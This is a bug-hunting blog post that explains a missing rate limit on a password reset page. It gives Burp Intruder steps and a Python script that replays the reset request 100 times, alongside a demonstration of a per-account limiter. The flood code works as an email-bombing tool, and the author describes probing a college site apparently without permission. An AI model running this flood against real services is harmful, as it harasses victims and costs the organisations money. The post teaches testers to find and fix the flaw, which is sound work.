The Easiest Bug to Start Your Bug Hunting Journey.

Allen Lopes
4 min readNov 23, 2023



What if, one fine day, while enjoying a movie on your phone, you suddenly find yourself bombarded with email notifications about new password reset links being requested, even though you never asked for a reset? Wouldn't that be annoying? And what if it kept happening every single day? Annoying, and also a little terrifying, isn't it? Let's explore how this can happen.

What is the impact of such a vulnerability?

  • If the organization pays per message for a transactional email service, an email API or an SMS gateway, every forced reset message costs money, so an unthrottled endpoint turns into a direct financial loss.
  • It also loads the mail queue and the application itself, and fills the sender's sent-mail storage.
  • The targeted user, whose email address or phone number is hit with mass password resets, is annoyed at best and may stop trusting the service; if customers leave because of it, that is a risk to the business.

A little bit about Rate Limit:

A rate limiting algorithm decides whether a given client has to be throttled, based on how many requests it has made within the recent time window. The client is usually identified by session or IP address, but for a password reset endpoint the limit should also be keyed by the targeted account, because an attacker can spread requests over many IPs while the victim's inbox is the same. When a client exceeds the allowed number of requests in the window, the HTTP server can respond with status code 429 Too Many Requests instead of processing the request.

A little bit about Burp:

Burp Suite is a proxy-based tool used to evaluate the security of web applications and do hands-on testing: it sits between the browser and the server, so every request can be intercepted, modified, and replayed, either by hand (Repeater) or in bulk (Intruder).

How to exploit?

Let us assume that the website is www.justexample.com.

1. On the main login page of the website there is a "Forgot password" option. Click it.

2. Fill in the mandatory details for requesting the password reset link: the name, email and phone number of the user whose password is to be reset. Do not click the verify button yet.

3. Turn on interception in Burp's Proxy tab, then click 'VERIFY' on the FORGOT PASSWORD page of www.justexample.com. Click 'Forward' once in the Proxy tab so that this first request reaches the server.

4. Send that captured request from the Proxy tab to the Intruder tab.

5. In Intruder, mark a payload position whose value has no effect on how the request is processed, so the only thing changing between requests is a harmless value. I chose the q-value of the Accept-Language header:

Accept-Language: en-US,en;q=0.§9§

6. Use a numbers payload (for example 1 to 100) and start the attack, so the same request is replayed 100 times. (Intruder's "Null payloads" type achieves the same without touching the request at all.)

7. If a rate limit were in place, some of the responses would come back as 429, or the later reset emails would simply not be sent. Here every request returns '200 OK' and 100+ new password reset links land in the victim's inbox: the endpoint has no rate limit.

8. As you can see, my email got flooded with 100+ password reset links.
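The attack above boils down to replaying one forgot-password request many times and counting the status codes, and the fix is the per-account rate limit described in the rate-limit section earlier. The Python script below is an added example, not code from the original post: it reproduces the Intruder run (varying only the Accept-Language q-value, as the §9§ payload position does) against an injectable transport, so it can be pointed at two stand-in endpoints, one with no limiter and one behind a sliding-window limit keyed by the targeted account. The endpoint path /forgot-password, the single `email` form field, the victim address and the limit of 5 requests per 10 minutes are assumptions made for the example; www.justexample.com is the post's own placeholder host.

```python
import time
from collections import defaultdict, deque
from urllib import request as urlrequest
from urllib.error import HTTPError
from urllib.parse import urlencode

# Assumed path on the post's placeholder host; the real path is not known.
TARGET = "https://www.justexample.com/forgot-password"


def send_reset_over_http(url, fields, headers):
    """Real transport: one POST using only the standard library. Use it only
    against a target you are authorised to test; the demo below never calls it."""
    req = urlrequest.Request(url, data=urlencode(fields).encode(),
                             headers=headers, method="POST")
    try:
        with urlrequest.urlopen(req, timeout=10) as resp:
            return resp.status
    except HTTPError as err:          # 4xx/5xx responses still carry a status
        return err.code


def flood_reset(email, count, send, url=TARGET):
    """Replay the forgot-password request `count` times. Only the q-value of
    Accept-Language changes between requests (the same trick as the Intruder
    payload position), which the server ignores. Returns a tally of
    status code -> number of responses."""
    tally = defaultdict(int)
    for i in range(count):
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept-Language": f"en-US,en;q=0.{i}",   # harmless variation
        }
        tally[send(url, {"email": email}, headers)] += 1
    return dict(tally)


def has_rate_limit(tally):
    """The check a tester wants from the run: was anything throttled?"""
    return tally.get(429, 0) > 0


class NoLimitEndpoint:
    """Stand-in for the vulnerable endpoint: every request is accepted and a
    reset email is 'sent', which is exactly what the post observed."""

    def __init__(self):
        self.emails_sent = defaultdict(int)

    def __call__(self, url, fields, headers):
        self.emails_sent[fields["email"].strip().lower()] += 1
        return 200


class RateLimitedEndpoint(NoLimitEndpoint):
    """Same endpoint behind a sliding-window limit keyed by the targeted
    account rather than by client IP, so spreading requests across proxies
    does not help. Over the limit it answers 429 Too Many Requests and, the
    part that matters for the victim, sends no email."""

    def __init__(self, limit=5, window_s=600, clock=time.monotonic):
        super().__init__()
        self.limit, self.window_s, self.clock = limit, window_s, clock
        self.history = defaultdict(deque)     # account -> request timestamps

    def __call__(self, url, fields, headers):
        key = fields["email"].strip().lower()
        now = self.clock()
        hits = self.history[key]
        while hits and now - hits[0] > self.window_s:   # drop expired entries
            hits.popleft()
        if len(hits) >= self.limit:
            return 429
        hits.append(now)
        return super().__call__(url, fields, headers)


if __name__ == "__main__":
    victim = "victim@justexample.com"              # constructed sample target
    print("no limiter  :", flood_reset(victim, 100, NoLimitEndpoint()))
    print("with limiter:", flood_reset(victim, 100, RateLimitedEndpoint()))
    # Against a real, authorised target, pass send_reset_over_http instead.
```

Against the unthrottled stand-in the tally is 100 responses of 200 and 100 emails "sent"; against the limited one it is 5 of 200 and 95 of 429, with only 5 emails sent. Keying the limiter by the normalised account identifier is the design choice worth copying: an IP-only limit still lets an attacker flood one inbox from many addresses.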

Did I get a bounty?

Since I discovered the vulnerability on my college website, I received neither a bounty nor recognition. Stay tuned for the next writeup to learn how I was able to log into my college's students' accounts without their being aware of it. Subsequently, I was warned not to exploit any vulnerabilities in the system again. :)

Thanks for reading. If you have any questions feel free to let me know.


Written by Allen Lopes

Developer, bug bounty hunter and perpetual learner.
